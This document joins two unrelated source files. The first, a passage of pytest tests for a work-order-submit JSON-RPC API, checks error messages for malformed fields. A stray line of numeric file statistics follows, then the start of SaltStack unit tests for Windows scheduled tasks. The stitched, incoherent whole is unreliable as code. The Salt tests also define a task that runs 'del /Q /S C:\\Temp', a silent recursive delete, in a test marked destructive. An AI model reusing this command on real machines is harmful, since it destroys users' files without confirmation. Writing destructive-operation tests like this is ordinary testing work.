env.work_order_input_file,
"work_order_submit_with_outdata.json")
err_cd = \
self.test_obj.setup_and_build_request_wo_submit(
read_json(request_file))
submit_response = submit_request(
self.test_obj.uri_client,
self.test_obj.build_request_output['request_obj'],
env.wo_submit_output_json_file_name,
read_json(request_file))
result_response = self.test_obj.getresult(
self.test_obj.build_request_output['request_obj'],
submit_response)
assert (
verify_test(
result_response, 0,
self.test_obj.build_request_output['pre_test_output'],
self.test_obj.build_request_output['action_obj'])
is ResultStatus.SUCCESS.value)
logger.info('\t\t!!! Test completed !!!\n\n')
@pytest.mark.workordersubmit
@pytest.mark.listener
@pytest.mark.negative
def test_workordersubmit_indata_bothindexremoveDataDatahash(self):
test_id = '18714'
request_file = os.path.join(
env.work_order_input_file,
"work_order_submit_remove_both_data_datahash_in_inData.json")
err_cd = \
self.test_obj.setup_and_build_request_wo_submit(
read_json(request_file))
submit_response = submit_request(
self.test_obj.uri_client,
self.test_obj.build_request_output['request_obj'],
env.wo_submit_output_json_file_name,
read_json(request_file))
result_response = self.test_obj.getresult(
self.test_obj.build_request_output['request_obj'],
submit_response)
assert (
check_negative_test_responses(
result_response,
"Missing in data parameter data")
is ResultStatus.SUCCESS.value)
logger.info('\t\t!!! Test completed !!!\n\n')
@pytest.mark.workordersubmit
@pytest.mark.listener
@pytest.mark.negative
def test_workordersubmit_indata_oneValidOtherEmptDataDatahash(self):
test_id = '18715'
request_file = os.path.join(
env.work_order_input_file,
"work_order_submit_with_one_valid_and_other_empty_data_and_datahash_in_indata.json")
err_cd = \
self.test_obj.setup_and_build_request_wo_submit(
read_json(request_file))
submit_response = submit_request(
self.test_obj.uri_client,
self.test_obj.build_request_output['request_obj'],
env.wo_submit_output_json_file_name,
read_json(request_file))
result_response = self.test_obj.getresult(
self.test_obj.build_request_output['request_obj'],
submit_response)
assert (
check_negative_test_responses(
result_response,
"Invalid data format for data hash of in data")
is ResultStatus.SUCCESS.value)
logger.info('\t\t!!! Test completed !!!\n\n')
@pytest.mark.workordersubmit
@pytest.mark.listener
@pytest.mark.negative
def test_workordersubmit_indata_singleindexremoveDataDatahash(self):
test_id = '18716'
request_file = os.path.join(
env.work_order_input_file,
"work_order_submit_remove_both_data_datahash_Single_index_in_inData.json")
err_cd = \
self.test_obj.setup_and_build_request_wo_submit(
read_json(request_file))
submit_response = submit_request(
self.test_obj.uri_client,
self.test_obj.build_request_output['request_obj'],
env.wo_submit_output_json_file_name,
read_json(request_file))
result_response = self.test_obj.getresult(
self.test_obj.build_request_output['request_obj'],
submit_response)
assert (
check_negative_test_responses(
result_response,
"Missing in data parameter data")
is ResultStatus.SUCCESS.value)
logger.info('\t\t!!! Test completed !!!\n\n')
@pytest.mark.workordersubmit
@pytest.mark.listener
@pytest.mark.sdk_1
@pytest.mark.negative
def test_workordersubmit_indata_index2randomstr(self):
test_id = '18719'
request_file = os.path.join(
env.work_order_input_file,
"work_order_submit_indata_data_index2_random_str.json")
err_cd = \
self.test_obj.setup_and_build_request_wo_submit(
read_json(request_file))
submit_response = submit_request(
self.test_obj.uri_client,
self.test_obj.build_request_output['request_obj'],
env.wo_submit_output_json_file_name,
read_json(request_file))
result_response = self.test_obj.getresult(
self.test_obj.build_request_output['request_obj'],
submit_response)
assert (
check_negative_test_responses(
result_response,
"Invalid Request")
is ResultStatus.SUCCESS.value)
logger.info('\t\t!!! Test completed !!!\n\n')
@pytest.mark.workordersubmit
@pytest.mark.listener
@pytest.mark.sdk_1
@pytest.mark.negative
def test_workordersubmit_indata_index1randomstr(self):
test_id = '18720'
request_file = os.path.join(
env.work_order_input_file,
"work_order_submit_indata_data_index1_random_str.json")
err_cd = \
self.test_obj.setup_and_build_request_wo_submit(
read_json(request_file))
submit_response = submit_request(
self.test_obj.uri_client,
self.test_obj.build_request_output['request_obj'],
env.wo_submit_output_json_file_name,
read_json(request_file))
result_response = self.test_obj.getresult(
self.test_obj.build_request_output['request_obj'],
submit_response)
assert (
check_negative_test_responses(
result_response,
"Invalid Request")
is ResultStatus.SUCCESS.value)
logger.info('\t\t!!! Test completed !!!\n\n')
@pytest.mark.workordersubmit
@pytest.mark.listener
@pytest.mark.sdk
@pytest.mark.fabric
@pytest.mark.ethereum
@pytest.mark.negative
def test_workordersubmit_workloadid_emptystring(self):
test_id = '18722'
request_file = os.path.join(
env.work_order_input_file,
"work_order_submit_workload_id_empty_string.json")
err_cd = \
self.test_obj.setup_and_build_request_wo_submit(
read_json(request_file))
submit_response = submit_request(
self.test_obj.uri_client,
self.test_obj.build_request_output['request_obj'],
env.wo_submit_output_json_file_name,
read_json(request_file))
result_response = self.test_obj.getresult(
self.test_obj.build_request_output['request_obj'],
submit_response)
assert (
check_negative_test_responses(
result_response,
"Invalid data format for work load id")
is ResultStatus.SUCCESS.value)
logger.info('\t\t!!! Test completed !!!\n\n')
@pytest.mark.workordersubmit
@pytest.mark.listener
@pytest.mark.sdk
@pytest.mark.fabric
@pytest.mark.ethereum
@pytest.mark.negative
def test_workordersubmit_workloadid_hexstring(self):
test_id = '18723'
request_file = os.path.join(
env.work_order_input_file,
"work_order_submit_workload_id_hex_string.json")
err_cd = \
self.test_obj.setup_and_build_request_wo_submit(
read_json(request_file))
submit_response = submit_request(
self.test_obj.uri_client,
self.test_obj.build_request_output['request_obj'],
env.wo_submit_output_json_file_name,
read_json(request_file))
result_response = self.test_obj.getresult(
self.test_obj.build_request_output['request_obj'],
submit_response)
assert (
check_negative_test_responses(
result_response,
"Workload cannot be processed by this worker")
is ResultStatus.SUCCESS.value)
logger.info('\t\t!!! Test completed !!!\n\n')
@pytest.mark.workordersubmit
@pytest.mark.listener
@pytest.mark.negative
def test_workordersubmit_workload_nullstring(self):
test_id = '18726'
request_file = os.path.join(
env.work_order_input_file,
"work_order_submit_workLoad_null_string.json")
err_cd = \
self.test_obj.setup_and_build_request_wo_submit(
read_json(request_file))
submit_response = submit_request(
self.test_obj.uri_client,
self.test_obj.build_request_output['request_obj'],
env.wo_submit_output_json_file_name,
read_json(request_file))
result_response = self.test_obj.getresult(
self.test_obj.build_request_output['request_obj'],
submit_response)
assert (
check_negative_test_responses(
result_response,
"Workload cannot be processed by this worker")
is ResultStatus.SUCCESS.value)
logger.info('\t\t!!! Test completed !!!\n\n')
@pytest.mark.workordersubmit
@pytest.mark.listener
@pytest.mark.sdk
@pytest.mark.fabric
@pytest.mark.ethereum
@pytest.mark.negative
def test_workordersubmit_workorderid_increasedhexlength(self):
test_id = '18727'
request_file = os.path.join(
env.work_order_input_file,
"work_order_submit_WorkOrder_increased_hexlength.json")
err_cd = \
self.test_obj.setup_and_build_request_wo_submit(
read_json(request_file))
submit_response = submit_request(
self.test_obj.uri_client,
self.test_obj.build_request_output['request_obj'],
env.wo_submit_output_json_file_name,
read_json(request_file))
result_response = self.test_obj.getresult(
self.test_obj.build_request_output['request_obj'],
submit_response)
assert (
check_negative_test_responses(
result_response,
"Invalid data format for work order id")
is ResultStatus.SUCCESS.value)
logger.info('\t\t!!! Test completed !!!\n\n')
@pytest.mark.workordersubmit
@pytest.mark.listener
@pytest.mark.sdk
@pytest.mark.fabric
@pytest.mark.ethereum
@pytest.mark.negative
def test_workordersubmit_workorderidworkloadid_same(self):
test_id = '18728'
request_file = os.path.join(
env.work_order_input_file,
"work_order_submit_same_WorkOrderID_WorkloadId.json")
err_cd = \
self.test_obj.setup_and_build_request_wo_submit(
read_json(request_file))
submit_response = submit_request(
self.test_obj.uri_client,
self.test_obj.build_request_output['request_obj'],
env.wo_submit_output_json_file_name,
read_json(request_file))
result_response = self.test_obj.getresult(
self.test_obj.build_request_output['request_obj'],
submit_response)
assert (
check_negative_test_responses(
result_response,
"Invalid data format for work order id")
is ResultStatus.SUCCESS.value)
logger.info('\t\t!!! Test completed !!!\n\n')
@pytest.mark.workordersubmit
@pytest.mark.listener
@pytest.mark.sdk
@pytest.mark.fabric
@pytest.mark.ethereum
@pytest.mark.positive
def test_workordersubmit_data_differentdataheartdisease(self):
test_id = '18731'
request_file = os.path.join(
env.work_order_input_file,
"work_order_submit_indata_index1_data_different_hexlength.json")
err_cd = \
self.test_obj.setup_and_build_request_wo_submit(
read_json(request_file))
submit_response = submit_request(
self.test_obj.uri_client,
self.test_obj.build_request_output['request_obj'],
env.wo_submit_output_json_file_name,
read_json(request_file))
result_response = self.test_obj.getresult(
self.test_obj.build_request_output['request_obj'],
submit_response)
assert (
verify_test(
result_response, 0,
self.test_obj.build_request_output['pre_test_output'],
self.test_obj.build_request_output['action_obj'])
is ResultStatus.SUCCESS.value)
logger.info('\t\t!!! Test completed !!!\n\n')
@pytest.mark.workordersubmit
@pytest.mark.listener
@pytest.mark.sdk
@pytest.mark.fabric
@pytest.mark.ethereum
@pytest.mark.negative
def test_workordersubmit_requesterId_specialcharacter(self):
test_id = '18734'
request_file = os.path.join(
env.work_order_input_file,
"work_order_submit_requesterId_som_special_characters.json")
err_cd = \
self.test_obj.setup_and_build_request_wo_submit(
read_json(request_file))
submit_response = submit_request(
self.test_obj.uri_client,
self.test_obj.build_request_output['request_obj'],
env.wo_submit_output_json_file_name,
read_json(request_file))
result_response = self.test_obj.getresult(
self.test_obj.build_request_output['request_obj'],
submit_response)
assert (
check_negative_test_responses(
result_response,
"Invalid data format for requester id")
is ResultStatus.SUCCESS.value)
logger.info('\t\t!!! Test completed !!!\n\n')
@pytest.mark.workordersubmit
@pytest.mark.listener
@pytest.mark.sdk
@pytest.mark.fabric
@pytest.mark.ethereum
@pytest.mark.negative
def test_workordersubmit_requesterNonce_param_empty(self):
test_id = '18735'
request_file = os.path.join(
env.work_order_input_file,
"work_order_submit_requesterNonce_param_empty.json")
err_cd = \
self.test_obj.setup_and_build_request_wo_submit(
read_json(request_file))
submit_response = submit_request(
self.test_obj.uri_client,
self.test_obj.build_request_output['request_obj'],
env.wo_submit_output_json_file_name,
read_json(request_file))
result_response = self.test_obj.getresult(
self.test_obj.build_request_output['request_obj'],
submit_response)
assert (
check_negative_test_responses(
result_response,
"Empty or Invalid data format for requesterNonce")
is ResultStatus.SUCCESS.value)
logger.info('\t\t!!! Test completed !!!\n\n')
@pytest.mark.workordersubmit
@pytest.mark.listener
@pytest.mark.negative
def test_workordersubmit_requestersignature_differentlength(self):
test_id = '18492'
request_file = os.path.join(
env.work_order_input_file,
"work_order_verify_requesterSignature_diff_length.json")
err_cd = \
self.test_obj.setup_and_build_request_wo_submit(
read_json(request_file))
submit_response = submit_request(
self.test_obj.uri_client,
self.test_obj.build_request_output['request_obj'],
env.wo_submit_output_json_file_name,
read_json(request_file))
result_response = self.test_obj.getresult(
self.test_obj.build_request_output['request_obj'],
submit_response)
assert (
check_negative_test_responses(
result_response,
"Invalid data format for requesterSignature")
is ResultStatus.SUCCESS.value)
logger.info('\t\t!!! Test completed !!!\n\n')
@pytest.mark.workordersubmit
@pytest.mark.listener
@pytest.mark.negative
def test_workordersubmit_verifyingkey_nullstr(self):
test_id = '18501'
request_file = os.path.join(
env.work_order_input_file,
"work_order_submit_verifyingkey_null_str.json")
err_cd = \
self.test_obj.setup_and_build_request_wo_submit(
read_json(request_file))
submit_response = submit_request(
self.test_obj.uri_client,
self.test_obj.build_request_output['request_obj'],
env.wo_submit_output_json_file_name,
read_json(request_file))
result_response = self.test_obj.getresult(
self.test_obj.build_request_output['request_obj'],
submit_response)
assert (
check_negative_test_responses(
result_response,
"Crypto Error (deserializeECDSAPublicKey): Could not deserialize public ECDSA key")
is ResultStatus.SUCCESS.value)
logger.info('\t\t!!! Test completed !!!\n\n')
@pytest.mark.workordersubmit
@pytest.mark.listener
@pytest.mark.sdk
@pytest.mark.fabric
@pytest.mark.ethereum
@pytest.mark.positive
def test_workordersubmit_indataoutdata_success(self):
test_id = '18703'
request_file = os.path.join(
env.work_order_input_file,
"workordersubmit_indata_outdata.json")
err_cd = \
self.test_obj.setup_and_build_request_wo_submit(
read_json(request_file))
submit_response = submit_request(
self.test_obj.uri_client,
self.test_obj.build_request_output['request_obj'],
env.wo_submit_output_json_file_name,
read_json(request_file))
result_response = self.test_obj.getresult(
self.test_obj.build_request_output['request_obj'],
submit_response)
assert (
verify_test(
result_response, 0,
self.test_obj.build_request_output['pre_test_output'],
self.test_obj.build_request_output['action_obj'])
is ResultStatus.SUCCESS.value)
logger.info('\t\t!!! Test completed !!!\n\n')
@pytest.mark.workordersubmit
@pytest.mark.sdk
@pytest.mark.fabric
@pytest.mark.ethereum
@pytest.mark.listener
@pytest.mark.negative
def test_workordersubmit_workorderId_remove(self):
test_id = '18725'
request_file = os.path.join(
env.work_order_input_file,
"workordersubmit_workorderId_remove.json")
err_cd = \
self.test_obj.setup_and_build_request_wo_submit(
read_json(request_file))
submit_response = submit_request(
self.test_obj.uri_client,
self.test_obj.build_request_output['request_obj'],
env.wo_submit_output_json_file_name,
read_json(request_file))
result_response = self.test_obj.getresult(
self.test_obj.build_request_output['request_obj'],
submit_response)
assert (
check_negative_test_responses(
result_response,
"Invalid data format for work order id")
is ResultStatus.SUCCESS.value)
logger.info('\t\t!!! Test completed !!!\n\n')
@pytest.mark.workordersubmit
@pytest.mark.listener
@pytest.mark.negative
def test_workordersubmit_sessionkeyiv_allspecial_characters(self):
test_id = '18737'
request_file = os.path.join(
env.work_order_input_file,
"workordersubmit_sessionkeyiv_allspecialchar.json")
err_cd = \
self.test_obj.setup_and_build_request_wo_submit(
read_json(request_file))
submit_response = submit_request(
self.test_obj.uri_client,
self.test_obj.build_request_output['request_obj'],
env.wo_submit_output_json_file_name,
read_json(request_file))
result_response = self.test_obj.getresult(
self.test_obj.build_request_output['request_obj'],
submit_response)
assert (
check_negative_test_responses(
result_response,
"Invalid data format for session key iv")
is ResultStatus.SUCCESS.value)
logger.info('\t\t!!! Test completed !!!\n\n')
@pytest.mark.workordersubmit
@pytest.mark.listener
@pytest.mark.sdk
@pytest.mark.fabric
@pytest.mark.ethereum
@pytest.mark.negative
def test_workordersubmit_requesterId_differenthexlength(self):
test_id = '18742'
request_file = os.path.join(
env.work_order_input_file,
"workordersubmit_requesterId_variouslengthhex.json")
err_cd = \
self.test_obj.setup_and_build_request_wo_submit(
read_json(request_file))
submit_response = submit_request(
self.test_obj.uri_client,
self.test_obj.build_request_output['request_obj'],
env.wo_submit_output_json_file_name,
read_json(request_file))
result_response = self.test_obj.getresult(
self.test_obj.build_request_output['request_obj'],
submit_response)
assert (
check_negative_test_responses(
result_response,
"Invalid parameter requesterId")
is ResultStatus.SUCCESS.value)
logger.info('\t\t!!! Test completed !!!\n\n')
@pytest.mark.workordersubmit
@pytest.mark.listener
@pytest.mark.negative
def test_workordersubmit_workerEncryptionKey_notdefaulthex(self):
test_id = '18743'
request_file = os.path.join(
env.work_order_input_file,
"workordersubmit_workerEncryptionKey_notdefaulthex.json")
err_cd = \
self.test_obj.setup_and_build_request_wo_submit(
read_json(request_file))
submit_response = submit_request(
self.test_obj.uri_client,
self.test_obj.build_request_output['request_obj'],
env.wo_submit_output_json_file_name,
read_json(request_file))
result_response = self.test_obj.getresult(
self.test_obj.build_request_output['request_obj'],
submit_response)
assert (
check_negative_test_responses(
result_response,
"Invalid parameter workerEncryptionKey")
is ResultStatus.SUCCESS.value)
logger.info('\t\t!!! Test completed !!!\n\n')
@pytest.mark.workordersubmit
@pytest.mark.sdk
@pytest.mark.fabric
@pytest.mark.ethereum
@pytest.mark.negative
def test_workordersubmit_sdk_workerEncryptionKey_notdefaulthex(self):
with pytest.raises(ValueError,
match="Encrypting Session key failed: Invalid session key or worker encryption key"):
test_id = '18743'
request_file = os.path.join(
env.work_order_input_file,
"workordersubmit_workerEncryptionKey_notdefaulthex.json")
err_cd = \
self.test_obj.setup_and_build_request_wo_submit(
read_json(request_file))
submit_response = submit_request(
self.test_obj.uri_client,
self.test_obj.build_request_output['request_obj'],
env.wo_submit_output_json_file_name,
read_json(request_file))
logger.info('\t\t!!! Test completed !!!\n\n')
@pytest.mark.workordersubmit
@pytest.mark.listener
@pytest.mark.sdk
@pytest.mark.fabric
@pytest.mark.ethereum
@pytest.mark.negative
def test_workordersubmit_requesterNonce_notdefaultlength(self):
test_id = '18745'
request_file = os.path.join(
env.work_order_input_file,
"workordersubmit_requesterNonce_notdefaultlength.json")
err_cd = \
self.test_obj.setup_and_build_request_wo_submit(
read_json(request_file))
submit_response = submit_request(
self.test_obj.uri_client,
self.test_obj.build_request_output['request_obj'],
env.wo_submit_output_json_file_name,
read_json(request_file))
result_response = self.test_obj.getresult(
self.test_obj.build_request_output['request_obj'],
submit_response)
assert (
check_negative_test_responses(
result_response,
"Invalid parameter requesterNonce")
is ResultStatus.SUCCESS.value)
logger.info('\t\t!!! Test completed !!!\n\n')
@pytest.mark.workordersubmit
@pytest.mark.listener
@pytest.mark.positive
def test_workordersubmit_requesterSignature_no(self):
test_id = '18613'
request_file = os.path.join(
env.work_order_input_file,
"workordersubmit_encryptedRequestHash_norequesterSignature.json")
err_cd = \
self.test_obj.setup_and_build_request_wo_submit(
read_json(request_file))
submit_response = submit_request(
self.test_obj.uri_client,
self.test_obj.build_request_output['request_obj'],
env.wo_submit_output_json_file_name,
read_json(request_file))
result_response = self.test_obj.getresult(
self.test_obj.build_request_output['request_obj'],
submit_response)
assert (
verify_test(
result_response, 0,
self.test_obj.build_request_output['pre_test_output'],
self.test_obj.build_request_output['action_obj'])
is ResultStatus.SUCCESS.value)
logger.info('\t\t!!! Test completed !!!\n\n')
@pytest.mark.workordersubmit
@pytest.mark.listener
@pytest.mark.negative
def test_workordersubmit_encryptedRequestHash_no(self):
test_id = '18777'
request_file = os.path.join(
env.work_order_input_file,
"workordersubmit_requesterSignature_noencryptedRequestHash.json")
err_cd = \
self.test_obj.setup_and_build_request_wo_submit(
read_json(request_file))
submit_response = submit_request(
self.test_obj.uri_client,
self.test_obj.build_request_output['request_obj'],
env.wo_submit_output_json_file_name,
read_json(request_file))
result_response = self.test_obj.getresult(
self.test_obj.build_request_output['request_obj'],
submit_response)
assert (
check_negative_test_responses(
result_response,
"Missing parameter encryptedRequestHash")
is ResultStatus.SUCCESS.value)
logger.info('\t\t!!! Test completed !!!\n\n')
@pytest.mark.workordersubmit
@pytest.mark.negative
def test_workordersubmit_mandatoryfields_remove(self):
test_id = '18781'
request_file = os.path.join(
env.work_order_input_file,
"workordersubmit_mandatoryfields_remove.json")
err_cd = \
self.test_obj.setup_and_build_request_wo_submit(
read_json(request_file))
submit_response = submit_request(
self.test_obj.uri_client,
self.test_obj.build_request_output['request_obj'],
env.wo_submit_output_json_file_name,
read_json(request_file))
result_response = self.test_obj.getresult(
self.test_obj.build_request_output['request_obj'],
submit_response)
assert (
check_negative_test_responses(
result_response,
"Invalid params")
is ResultStatus.SUCCESS.value)
logger.info('\t\t!!! Test completed !!!\n\n')
@pytest.mark.workordersubmit
@pytest.mark.listener
@pytest.mark.negative
def test_workordersubmit_id_remove(self):
test_id = '18787'
request_file = os.path.join(
env.work_order_input_file,
"workordersubmit_id_remove.json")
err_cd = \
self.test_obj.setup_and_build_request_wo_submit(
read_json(request_file))
submit_response = submit_request(
self.test_obj.uri_client,
self.test_obj.build_request_output['request_obj'],
env.wo_submit_output_json_file_name,
read_json(request_file))
result_response = self.test_obj.getresult(
self.test_obj.build_request_output['request_obj'],
submit_response)
assert (
check_negative_test_responses(
result_response,
"Server error")
is ResultStatus.SUCCESS.value)
logger.info('\t\t!!! Test completed !!!\n\n')
@pytest.mark.workordersubmit
@pytest.mark.listener
@pytest.mark.sdk
@pytest.mark.fabric
@pytest.mark.ethereum
@pytest.mark.negative
def test_workordersubmit_workeridworkloadid_same(self):
test_id = '18794'
request_file = os.path.join(
env.work_order_input_file,
"workordersubmit_workeridworkloadid_same.json")
err_cd = \
self.test_obj.setup_and_build_request_wo_submit(
read_json(request_file))
submit_response = submit_request(
self.test_obj.uri_client,
self.test_obj.build_request_output['request_obj'],
env.wo_submit_output_json_file_name,
read_json(request_file))
result_response = self.test_obj.getresult(
self.test_obj.build_request_output['request_obj'],
submit_response)
assert (
check_negative_test_responses(
result_response,
"worker 0xABCD doesn't exists")
is ResultStatus.SUCCESS.value)
logger.info('\t\t!!! Test completed !!!\n\n')
@pytest.mark.workordersubmit
@pytest.mark.listener
@pytest.mark.sdk
@pytest.mark.fabric
@pytest.mark.ethereum
@pytest.mark.positive
def test_workordersubmit_indata_firstinparams(self):
test_id = '18796'
request_file = os.path.join(
env.work_order_input_file,
"workordersubmit_indata_firstinparams.json")
err_cd = \
self.test_obj.setup_and_build_request_wo_submit(
read_json(request_file))
submit_response = submit_request(
self.test_obj.uri_client,
self.test_obj.build_request_output['request_obj'],
env.wo_submit_output_json_file_name,
read_json(request_file))
result_response = self.test_obj.getresult(
self.test_obj.build_request_output['request_obj'],
submit_response)
assert (
verify_test(
result_response, 0,
self.test_obj.build_request_output['pre_test_output'],
self.test_obj.build_request_output['action_obj'])
is ResultStatus.SUCCESS.value)
logger.info('\t\t!!! Test completed !!!\n\n')
@pytest.mark.workordersubmit
@pytest.mark.listener
@pytest.mark.negative
def test_workordersubmit_params_unknownparameter(self):
test_id = '18700'
request_file = os.path.join(
env.work_order_input_file,
"workordersubmit_params_unknownparameter.json")
msg_response = self.test_obj.post_json_msg(request_file)
assert (
check_negative_test_responses(
msg_response,
"Invalid parameter unknownEncoding")
is ResultStatus.SUCCESS.value)
logger.info('\t\t!!! Test completed !!!\n\n')
@pytest.mark.workordersubmit
@pytest.mark.listener
@pytest.mark.negative
def test_workordersubmit_workerId_notdefaultlength_postmsg(self):
test_id = '20365'
request_file = os.path.join(
env.work_order_input_file,
"workordersubmit_workerId_notdefaultlength_postmsg.json")
msg_response = self.test_obj.post_json_msg(request_file)
assert (
check_negative_test_responses(
msg_response,
"worker 6ba1f459476bc43b65fd554f6b65910a8f551e4bcb0eee6a96dcebaeb14f2ae923456234564567 doesn't exists")
is ResultStatus.SUCCESS.value)
logger.info('\t\t!!! Test completed !!!\n\n')
@pytest.mark.workordersubmit
@pytest.mark.listener
@pytest.mark.sdk
@pytest.mark.fabric
@pytest.mark.ethereum
@pytest.mark.negative
def test_workordersubmit_workerId_notdefaultlength(self):
test_id = '18741'
request_file = os.path.join(
env.work_order_input_file,
"workordersubmit_workerId_notdefaultlength.json")
err_cd = \
self.test_obj.setup_and_build_request_wo_submit(
read_json(request_file))
submit_response = submit_request(
self.test_obj.uri_client,
self.test_obj.build_request_output['request_obj'],
env.wo_submit_output_json_file_name,
read_json(request_file))
result_response = self.test_obj.getresult(
self.test_obj.build_request_output['request_obj'],
submit_response)
assert (
check_negative_test_responses(
result_response,
"worker 6ba1f459476bc43b65fd554f6b65910a8f551e4bcb0eee6a96dcebaeb14f2ae923456234564567 doesn't exists")
is ResultStatus.SUCCESS.value)
logger.info('\t\t!!! Test completed !!!\n\n')
@pytest.mark.workordersubmit
@pytest.mark.listener
@pytest.mark.sdk
@pytest.mark.fabric
@pytest.mark.ethereum
@pytest.mark.negative
def test_workordersubmit_payloadFormat_notJSONRPC(self):
test_id = '18750'
request_file = os.path.join(
env.work_order_input_file,
"workordersubmit_payloadFormat_notJSONRPC.json")
msg_response = self.test_obj.post_json_msg(request_file)
assert (
check_negative_test_responses(
msg_response,
"Invalid payload format")
is ResultStatus.SUCCESS.value)
logger.info('\t\t!!! Test completed !!!\n\n')
@pytest.mark.workordersubmit
@pytest.mark.listener
@pytest.mark.negative
def test_workordersubmit_params_empty(self):
test_id = '18762'
request_file = os.path.join(
env.work_order_input_file,
"workordersubmit_params_empty.json")
msg_response = self.test_obj.post_json_msg(request_file)
assert (
check_negative_test_responses(
msg_response,
"Invalid parameter params")
is ResultStatus.SUCCESS.value)
logger.info('\t\t!!! Test completed !!!\n\n')
@pytest.mark.workordersubmit
@pytest.mark.listener
@pytest.mark.sdk
@pytest.mark.fabric
@pytest.mark.ethereum
@pytest.mark.positive
def test_workordersubmit_OutDataDataEncryptionKey_hyphen(self):
test_id = '18784'
request_file = os.path.join(
env.work_order_input_file,
"workordersubmit_OutDataDataEncryptionKey_hyphen.json")
err_cd = \
self.test_obj.setup_and_build_request_wo_submit(
read_json(request_file))
submit_response = submit_request(
self.test_obj.uri_client,
self.test_obj.build_request_output['request_obj'],
env.wo_submit_output_json_file_name,
read_json(request_file))
result_response = self.test_obj.getresult(
self.test_obj.build_request_output['request_obj'],
submit_response)
assert (
verify_test(
result_response, 0,
self.test_obj.build_request_output['pre_test_output'],
self.test_obj.build_request_output['action_obj'])
is ResultStatus.SUCCESS.value)
logger.info('\t\t!!! Test completed !!!\n\n')
@pytest.mark.workordersubmit
@pytest.mark.listener
@pytest.mark.negative
def test_workordersubmit_params_twiceechoclient(self):
test_id = '18791'
request_file = os.path.join(
env.work_order_input_file,
"workordersubmit_params_twiceechoclient.json")
msg_response = self.test_obj.post_json_msg(request_file)
assert (
check_negative_test_responses(
msg_response,
"Duplicate parameter params")
is ResultStatus.SUCCESS.value)
logger.info('\t\t!!! Test completed !!!\n\n')
| 35.032024 | 123 | 0.625113 | 10,275 | 91,889 | 5.208175 | 0.038248 | 0.07684 | 0.089827 | 0.061591 | 0.91378 | 0.913182 | 0.909986 | 0.908398 | 0.907501 | 0.905782 | 0 | 0.008774 | 0.290524 | 91,889 | 2,622 | 124 | 35.045385 | 0.812081 | 0.009207 | 0 | 0.875576 | 0 | 0 | 0.123049 | 0.045001 | 0 | 0 | 0.000066 | 0 | 0.035484 | 1 | 0.037788 | false | 0 | 0.003687 | 0 | 0.042396 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
a00418b929de0feab807f49fe6519e8a041aa082 | 25,540 | py | Python | tests/unit/states/test_win_task.py | byteskeptical/salt | 637fe0b04f38b2274191b005d73b3c6707d7f400 | [
"Apache-2.0"
] | 2 | 2019-05-26T03:10:17.000Z | 2019-06-15T10:18:59.000Z | tests/unit/states/test_win_task.py | byteskeptical/salt | 637fe0b04f38b2274191b005d73b3c6707d7f400 | [
"Apache-2.0"
] | 12 | 2015-04-15T22:17:42.000Z | 2016-03-22T08:46:27.000Z | tests/unit/states/test_win_task.py | byteskeptical/salt | 637fe0b04f38b2274191b005d73b3c6707d7f400 | [
"Apache-2.0"
] | 4 | 2015-04-16T03:24:08.000Z | 2015-04-22T15:33:28.000Z | # -*- coding: utf-8 -*-
# https://msdn.microsoft.com/en-us/library/windows/desktop/aa383608(v=vs.85).aspx
from __future__ import absolute_import, print_function, unicode_literals
# Import Salt Libs
import salt.modules.win_task
import salt.states.win_task as win_task
# Import Salt Testing Libs
import salt.utils.platform
from tests.support.mixins import LoaderModuleMockMixin
from tests.support.mock import NO_MOCK, NO_MOCK_REASON, MagicMock, patch
from tests.support.unit import skipIf, TestCase
from tests.support.helpers import destructiveTest
@destructiveTest
@skipIf(NO_MOCK, NO_MOCK_REASON)
@skipIf(not salt.utils.platform.is_windows(), "Windows is required")
class WinTaskCase(TestCase, LoaderModuleMockMixin):
'''
Test cases for salt.states.win_task
'''
def setup_loader_modules(self):
return {win_task: {}}
def test_present(self):
kwargs = {'action_type': 'Execute',
'cmd': 'del /Q /S C:\\\\Temp',
'trigger_type': 'Once',
'start_data': '2019-05-14',
'start_time': '01:00 pm'}
ret = {'result': False}
try:
with patch.dict(win_task.__salt__, {'task.list_tasks': salt.modules.win_task.list_tasks,
'task.info': salt.modules.win_task.info,
'task.create_task': salt.modules.win_task.create_task}), \
patch.dict(win_task.__opts__, {"test": False}), \
patch.dict(win_task.__grains__, {'osversion': '7.1'}):
ret = win_task.present(name='salt', location='', force=True, **kwargs)
finally:
try:
salt.modules.win_task.delete_task(name='salt', location='')
finally:
pass
self.assertEqual(ret['result'], True)
def test_absent(self):
with patch.dict(win_task.__salt__, {'task.list_tasks': salt.modules.win_task.list_tasks,
'task.info': salt.modules.win_task.info,
'task.delete_task': salt.modules.win_task.delete_task}), \
patch.dict(win_task.__opts__, {"test": False}):
ret = win_task.absent('salt', '')
self.assertEqual(ret['result'], True)
kwargs = {'action_type': 'Execute',
'cmd': 'del /Q /S C:\\\\Temp',
'trigger_type': 'Once',
'start_data': '2019-05-14',
'start_time': '01:00 pm'}
try:
with patch.dict(win_task.__salt__, {'task.list_tasks': salt.modules.win_task.list_tasks,
'task.info': salt.modules.win_task.info,
'task.create_task': salt.modules.win_task.create_task}), \
patch.dict(win_task.__opts__, {"test": False}), \
patch.dict(win_task.__grains__, {'osversion': '7.1'}):
win_task.present(name='salt', location='', force=True, **kwargs)
finally:
try:
with patch.dict(win_task.__salt__, {'task.list_tasks': salt.modules.win_task.list_tasks,
'task.info': salt.modules.win_task.info,
'task.delete_task': salt.modules.win_task.delete_task}), \
patch.dict(win_task.__opts__, {"test": False}):
ret = win_task.absent('salt', '')
finally:
pass
self.assertEqual(ret['result'], True)
@skipIf(NO_MOCK, NO_MOCK_REASON)
@skipIf(not salt.utils.platform.is_windows(), "Windows is required")
class WinTaskPrivateCase(TestCase, LoaderModuleMockMixin):
def setup_loader_modules(self):
return {win_task: {}}
def test__get_arguments(self):
kwargs = {'salt': True,
'cat': 'nice',
'idk': 404}
true_ret = {'salt': True,
'cat': 'nice',
'fat': True,
'idk': 404}
ret = win_task._get_arguments(kwargs,
['cat'],
{'nice': ['idk'],
'sad': ['why']},
{'fat': True,
'salt': None})
self.assertEqual(ret, true_ret)
def test__get_task_state_prediction(self):
state = {'task_found': True,
'location_valid': True,
'task_info': {'conditions': {'ac_only': True,
'run_if_idle': False,
'run_if_network': False,
'start_when_available': False},
